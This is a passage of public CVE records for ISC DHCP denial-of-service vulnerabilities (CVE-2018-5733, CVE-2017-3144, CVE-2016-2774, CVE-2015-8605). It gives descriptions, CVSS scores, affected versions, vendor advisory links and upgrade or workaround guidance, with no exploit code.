          ],
          "url": "https://access.redhat.com/errata/RHSA-2018:0483"
        },
        {
          "name": "USN-3586-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/3586-1/"
        },
        {
          "name": "103188",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/103188"
        },
        {
          "name": "1040437",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1040437"
        },
        {
          "name": "[debian-lts-announce] 20180322 [SECURITY] [DLA 1313-1] isc-dhcp security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2018/03/msg00015.html"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "value": "Upgrade to the patched release most closely related to your current version of DHCP.\n\n    DHCP 4.1-ESV-R15-P1\n    DHCP 4.3.6-P1\n    DHCP 4.4.1"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "A malicious client can overflow a reference counter in ISC dhcpd",
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-officer@isc.org",
          "DATE_PUBLIC": "2018-02-28T00:00:00.000Z",
          "ID": "CVE-2018-5733",
          "STATE": "PUBLIC",
          "TITLE": "A malicious client can overflow a reference counter in ISC dhcpd"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "ISC DHCP",
                      "version": {
                        "version_data": [
                          {
                            "version_name": "ISC DHCP",
                            "version_value": "4.1.0 -\u003e 4.1-ESV-R15, 4.2.0 -\u003e 4.2.8, 4.3.0 -\u003e 4.3.6, 4.4.0"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "ISC"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "ISC would like to thank Felix Wilhelm, Google Security Team, for reporting this vulnerability."
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A malicious client which is allowed to send very large amounts of traffic (billions of packets) to a DHCP server can eventually overflow a 32-bit reference counter, potentially causing dhcpd to crash. Affects ISC DHCP 4.1.0 -\u003e 4.1-ESV-R15, 4.2.0 -\u003e 4.2.8, 4.3.0 -\u003e 4.3.6, 4.4.0."
            }
          ]
        },
        "impact": {
          "cvss": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 5.9,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "Successful exploitation of this vulnerability may exhaust the memory available to dhcpd and/or cause it to crash, resulting in a denial of service to clients."
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://kb.isc.org/docs/aa-01567",
              "refsource": "CONFIRM",
              "url": "https://kb.isc.org/docs/aa-01567"
            },
            {
              "name": "RHSA-2018:0469",
              "refsource": "REDHAT",
              "url": "https://access.redhat.com/errata/RHSA-2018:0469"
            },
            {
              "name": "DSA-4133",
              "refsource": "DEBIAN",
              "url": "https://www.debian.org/security/2018/dsa-4133"
            },
            {
              "name": "USN-3586-2",
              "refsource": "UBUNTU",
              "url": "https://usn.ubuntu.com/3586-2/"
            },
            {
              "name": "RHSA-2018:0483",
              "refsource": "REDHAT",
              "url": "https://access.redhat.com/errata/RHSA-2018:0483"
            },
            {
              "name": "USN-3586-1",
              "refsource": "UBUNTU",
              "url": "https://usn.ubuntu.com/3586-1/"
            },
            {
              "name": "103188",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/103188"
            },
            {
              "name": "1040437",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id/1040437"
            },
            {
              "name": "[debian-lts-announce] 20180322 [SECURITY] [DLA 1313-1] isc-dhcp security update",
              "refsource": "MLIST",
              "url": "https://lists.debian.org/debian-lts-announce/2018/03/msg00015.html"
            }
          ]
        },
        "solution": [
          {
            "lang": "en",
            "value": "Upgrade to the patched release most closely related to your current version of DHCP.\n\n    DHCP 4.1-ESV-R15-P1\n    DHCP 4.3.6-P1\n    DHCP 4.4.1"
          }
        ],
        "source": {
          "discovery": "EXTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "404fd4d2-a609-4245-b543-2c944a302a22",
    "assignerShortName": "isc",
    "cveId": "CVE-2018-5733",
    "datePublished": "2019-01-16T20:00:00.000Z",
    "dateReserved": "2018-01-17T00:00:00.000Z",
    "dateUpdated": "2025-04-25T23:02:52.084Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2017-3144 (GCVE-0-2017-3144)

Vulnerability from nvd – Published: 2019-01-16 20:00 – Updated: 2024-09-16 22:46
Title
Failure to properly clean up closed OMAPI connections can exhaust available sockets
Summary
A vulnerability stemming from failure to properly clean up closed OMAPI connections can lead to exhaustion of the pool of socket descriptors available to the DHCP server. Affects ISC DHCP 4.1.0 to 4.1-ESV-R15, 4.2.0 to 4.2.8, 4.3.0 to 4.3.6. Older versions may also be affected but are well beyond their end-of-life (EOL). Releases prior to 4.1.0 have not been tested.
CWE
  • By intentionally exploiting this vulnerability an attacker who is permitted to establish connections to the OMAPI control port can exhaust the pool of socket descriptors available to the DHCP server. Once exhausted, the server will not accept additional connections, potentially denying access to legitimate connections from the server operator. While the server will continue to receive and service DHCP client requests, the operator can be blocked from the ability to use OMAPI to control server state, add new lease reservations, etc.
Assigner
isc
References
https://access.redhat.com/errata/RHSA-2018:0158 (vendor-advisory, x_refsource_REDHAT)
https://www.debian.org/security/2018/dsa-4133 (vendor-advisory, x_refsource_DEBIAN)
http://www.securityfocus.com/bid/102726 (vdb-entry, x_refsource_BID)
http://www.securitytracker.com/id/1040194 (vdb-entry, x_refsource_SECTRACK)
https://usn.ubuntu.com/3586-1/ (vendor-advisory, x_refsource_UBUNTU)
https://kb.isc.org/docs/aa-01541 (x_refsource_CONFIRM)
Impacted products
Vendor: ISC
Product: ISC DHCP
Version: Affected: ISC DHCP 4.1.0 to 4.1-ESV-R15, 4.2.0 to 4.2.8, 4.3.0 to 4.3.6. Older versions may also be affected but are well beyond their end-of-life (EOL). Releases prior to 4.1.0 have not been tested.
Date Public
2018-01-16 00:00

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T14:16:28.230Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "RHSA-2018:0158",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2018:0158"
          },
          {
            "name": "DSA-4133",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2018/dsa-4133"
          },
          {
            "name": "102726",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/102726"
          },
          {
            "name": "1040194",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1040194"
          },
          {
            "name": "USN-3586-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/3586-1/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://kb.isc.org/docs/aa-01541"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "ISC DHCP",
          "vendor": "ISC",
          "versions": [
            {
              "status": "affected",
              "version": "ISC DHCP 4.1.0 to 4.1-ESV-R15, 4.2.0 to 4.2.8, 4.3.0 to 4.3.6.  Older versions may also be affected but are well beyond their end-of-life (EOL).  Releases prior to 4.1.0 have not been tested."
            }
          ]
        }
      ],
      "datePublic": "2018-01-16T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability stemming from failure to properly clean up closed OMAPI connections can lead to exhaustion of the pool of socket descriptors available to the DHCP server. Affects ISC DHCP 4.1.0 to 4.1-ESV-R15, 4.2.0 to 4.2.8, 4.3.0 to 4.3.6. Older versions may also be affected but are well beyond their end-of-life (EOL). Releases prior to 4.1.0 have not been tested."
        }
      ],
      "metrics": [
        {
          "cvssV3_0": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "By intentionally exploiting this vulnerability an attacker who is permitted to establish connections to the OMAPI control port can exhaust the pool of socket descriptors available to the DHCP server.\n\nOnce exhausted, the server will not accept additional connections, potentially denying access to legitimate connections from the server operator.  While the server will continue to receive and service DHCP client requests, the operator can be blocked from the ability to use OMAPI to control server state, add new lease reservations, etc.",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2019-01-17T10:57:01.000Z",
        "orgId": "404fd4d2-a609-4245-b543-2c944a302a22",
        "shortName": "isc"
      },
      "references": [
        {
          "name": "RHSA-2018:0158",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2018:0158"
        },
        {
          "name": "DSA-4133",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "https://www.debian.org/security/2018/dsa-4133"
        },
        {
          "name": "102726",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/102726"
        },
        {
          "name": "1040194",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1040194"
        },
        {
          "name": "USN-3586-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/3586-1/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://kb.isc.org/docs/aa-01541"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "title": "Failure to properly clean up closed OMAPI connections can exhaust available sockets",
      "workarounds": [
        {
          "lang": "en",
          "value": "The recommended remedy is to disallow access to the OMAPI control port from unauthorized clients (in accordance with best practices for server operation)."
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-officer@isc.org",
          "DATE_PUBLIC": "2018-01-16T00:00:00.000Z",
          "ID": "CVE-2017-3144",
          "STATE": "PUBLIC",
          "TITLE": "Failure to properly clean up closed OMAPI connections can exhaust available sockets"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "ISC DHCP",
                      "version": {
                        "version_data": [
                          {
                            "version_name": "ISC DHCP",
                            "version_value": "4.1.0 to 4.1-ESV-R15, 4.2.0 to 4.2.8, 4.3.0 to 4.3.6.  Older versions may also be affected but are well beyond their end-of-life (EOL).  Releases prior to 4.1.0 have not been tested."
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "ISC"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A vulnerability stemming from failure to properly clean up closed OMAPI connections can lead to exhaustion of the pool of socket descriptors available to the DHCP server. Affects ISC DHCP 4.1.0 to 4.1-ESV-R15, 4.2.0 to 4.2.8, 4.3.0 to 4.3.6. Older versions may also be affected but are well beyond their end-of-life (EOL). Releases prior to 4.1.0 have not been tested."
            }
          ]
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.0"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "By intentionally exploiting this vulnerability an attacker who is permitted to establish connections to the OMAPI control port can exhaust the pool of socket descriptors available to the DHCP server.\n\nOnce exhausted, the server will not accept additional connections, potentially denying access to legitimate connections from the server operator.  While the server will continue to receive and service DHCP client requests, the operator can be blocked from the ability to use OMAPI to control server state, add new lease reservations, etc."
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "RHSA-2018:0158",
              "refsource": "REDHAT",
              "url": "https://access.redhat.com/errata/RHSA-2018:0158"
            },
            {
              "name": "DSA-4133",
              "refsource": "DEBIAN",
              "url": "https://www.debian.org/security/2018/dsa-4133"
            },
            {
              "name": "102726",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/102726"
            },
            {
              "name": "1040194",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id/1040194"
            },
            {
              "name": "USN-3586-1",
              "refsource": "UBUNTU",
              "url": "https://usn.ubuntu.com/3586-1/"
            },
            {
              "name": "https://kb.isc.org/docs/aa-01541",
              "refsource": "CONFIRM",
              "url": "https://kb.isc.org/docs/aa-01541"
            }
          ]
        },
        "source": {
          "discovery": "UNKNOWN"
        },
        "work_around": [
          {
            "lang": "en",
            "value": "The recommended remedy is to disallow access to the OMAPI control port from unauthorized clients (in accordance with best practices for server operation)."
          }
        ]
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "404fd4d2-a609-4245-b543-2c944a302a22",
    "assignerShortName": "isc",
    "cveId": "CVE-2017-3144",
    "datePublished": "2019-01-16T20:00:00.000Z",
    "dateReserved": "2016-12-02T00:00:00.000Z",
    "dateUpdated": "2024-09-16T22:46:13.879Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2016-2774 (GCVE-0-2016-2774)

Vulnerability from nvd – Published: 2016-03-09 15:26 – Updated: 2024-08-05 23:32
Summary
ISC DHCP 4.1.x before 4.1-ESV-R13 and 4.2.x and 4.3.x before 4.3.4 does not restrict the number of concurrent TCP sessions, which allows remote attackers to cause a denial of service (INSIST assertion failure or request-processing outage) by establishing many sessions.
Severity
No CVSS data available.
CWE
  • n/a
Assigner
References
http://rhn.redhat.com/errata/RHSA-2016-2590.html (vendor-advisory, x_refsource_REDHAT)
http://www.securitytracker.com/id/1035196 (vdb-entry, x_refsource_SECTRACK)
https://kb.isc.org/article/AA-01354 (x_refsource_CONFIRM)
http://www.oracle.com/technetwork/topics/security… (x_refsource_CONFIRM)
http://lists.fedoraproject.org/pipermail/package-… (vendor-advisory, x_refsource_FEDORA)
https://usn.ubuntu.com/3586-1/ (vendor-advisory, x_refsource_UBUNTU)
http://lists.opensuse.org/opensuse-updates/2016-0… (vendor-advisory, x_refsource_SUSE)
http://lists.fedoraproject.org/pipermail/package-… (vendor-advisory, x_refsource_FEDORA)
http://www.securityfocus.com/bid/84208 (vdb-entry, x_refsource_BID)
https://lists.debian.org/debian-lts-announce/2019… (mailing-list, x_refsource_MLIST)
Date Public
2016-03-07 00:00

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T23:32:20.980Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "RHSA-2016:2590",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "http://rhn.redhat.com/errata/RHSA-2016-2590.html"
          },
          {
            "name": "1035196",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1035196"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://kb.isc.org/article/AA-01354"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.oracle.com/technetwork/topics/security/bulletinjul2016-3090568.html"
          },
          {
            "name": "FEDORA-2016-821f013cb1",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-May/183640.html"
          },
          {
            "name": "USN-3586-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/3586-1/"
          },
          {
            "name": "openSUSE-SU-2016:1843",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-updates/2016-07/msg00066.html"
          },
          {
            "name": "FEDORA-2016-c93d49faf3",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-May/183458.html"
          },
          {
            "name": "84208",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/84208"
          },
          {
            "name": "[debian-lts-announce] 20191124 [SECURITY] [DLA 2003-1] isc-dhcp security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00023.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2016-03-07T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "ISC DHCP 4.1.x before 4.1-ESV-R13 and 4.2.x and 4.3.x before 4.3.4 does not restrict the number of concurrent TCP sessions, which allows remote attackers to cause a denial of service (INSIST assertion failure or request-processing outage) by establishing many sessions."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2019-11-24T19:07:04.000Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "RHSA-2016:2590",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "http://rhn.redhat.com/errata/RHSA-2016-2590.html"
        },
        {
          "name": "1035196",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1035196"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://kb.isc.org/article/AA-01354"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.oracle.com/technetwork/topics/security/bulletinjul2016-3090568.html"
        },
        {
          "name": "FEDORA-2016-821f013cb1",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-May/183640.html"
        },
        {
          "name": "USN-3586-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/3586-1/"
        },
        {
          "name": "openSUSE-SU-2016:1843",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-updates/2016-07/msg00066.html"
        },
        {
          "name": "FEDORA-2016-c93d49faf3",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-May/183458.html"
        },
        {
          "name": "84208",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/84208"
        },
        {
          "name": "[debian-lts-announce] 20191124 [SECURITY] [DLA 2003-1] isc-dhcp security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00023.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2016-2774",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "ISC DHCP 4.1.x before 4.1-ESV-R13 and 4.2.x and 4.3.x before 4.3.4 does not restrict the number of concurrent TCP sessions, which allows remote attackers to cause a denial of service (INSIST assertion failure or request-processing outage) by establishing many sessions."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "RHSA-2016:2590",
              "refsource": "REDHAT",
              "url": "http://rhn.redhat.com/errata/RHSA-2016-2590.html"
            },
            {
              "name": "1035196",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id/1035196"
            },
            {
              "name": "https://kb.isc.org/article/AA-01354",
              "refsource": "CONFIRM",
              "url": "https://kb.isc.org/article/AA-01354"
            },
            {
              "name": "http://www.oracle.com/technetwork/topics/security/bulletinjul2016-3090568.html",
              "refsource": "CONFIRM",
              "url": "http://www.oracle.com/technetwork/topics/security/bulletinjul2016-3090568.html"
            },
            {
              "name": "FEDORA-2016-821f013cb1",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-May/183640.html"
            },
            {
              "name": "USN-3586-1",
              "refsource": "UBUNTU",
              "url": "https://usn.ubuntu.com/3586-1/"
            },
            {
              "name": "openSUSE-SU-2016:1843",
              "refsource": "SUSE",
              "url": "http://lists.opensuse.org/opensuse-updates/2016-07/msg00066.html"
            },
            {
              "name": "FEDORA-2016-c93d49faf3",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-May/183458.html"
            },
            {
              "name": "84208",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/84208"
            },
            {
              "name": "[debian-lts-announce] 20191124 [SECURITY] [DLA 2003-1] isc-dhcp security update",
              "refsource": "MLIST",
              "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00023.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2016-2774",
    "datePublished": "2016-03-09T15:26:00.000Z",
    "dateReserved": "2016-02-26T00:00:00.000Z",
    "dateUpdated": "2024-08-05T23:32:20.980Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2015-8605 (GCVE-0-2015-8605)

Vulnerability from nvd – Published: 2016-01-14 22:00 – Updated: 2024-08-06 08:20
Summary
ISC DHCP 4.x before 4.1-ESV-R12-P1, 4.2.x, and 4.3.x before 4.3.3-P1 allows remote attackers to cause a denial of service (application crash) via an invalid length field in a UDP IPv4 packet.
Severity
No CVSS data available.
CWE
  • n/a
Assigner
Date Public
2016-01-12 00:00

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T08:20:43.591Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "1034657",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1034657"
          },
          {
            "name": "openSUSE-SU-2016:0610",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-updates/2016-02/msg00168.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://kb.isc.org/article/AA-01334"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/"
          },
          {
            "name": "FEDORA-2016-0c5bb21bf1",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-January/175594.html"
          },
          {
            "name": "DSA-3442",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2016/dsa-3442"
          },
          {
            "name": "USN-2868-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "http://www.ubuntu.com/usn/USN-2868-1"
          },
          {
            "name": "FEDORA-2016-adb533a418",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-January/176031.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html"
          },
          {
            "name": "80703",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/80703"
          },
          {
            "name": "openSUSE-SU-2016:0601",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-updates/2016-02/msg00162.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2016-01-12T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "ISC DHCP 4.x before 4.1-ESV-R12-P1, 4.2.x, and 4.3.x before 4.3.3-P1 allows remote attackers to cause a denial of service (application crash) via an invalid length field in a UDP IPv4 packet."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2016-12-05T14:57:01.000Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "1034657",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1034657"
        },
        {
          "name": "openSUSE-SU-2016:0610",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-updates/2016-02/msg00168.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://kb.isc.org/article/AA-01334"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/"
        },
        {
          "name": "FEDORA-2016-0c5bb21bf1",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-January/175594.html"
        },
        {
          "name": "DSA-3442",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2016/dsa-3442"
        },
        {
          "name": "USN-2868-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "http://www.ubuntu.com/usn/USN-2868-1"
        },
        {
          "name": "FEDORA-2016-adb533a418",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-January/176031.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html"
        },
        {
          "name": "80703",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/80703"
        },
        {
          "name": "openSUSE-SU-2016:0601",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-updates/2016-02/msg00162.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2015-8605",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
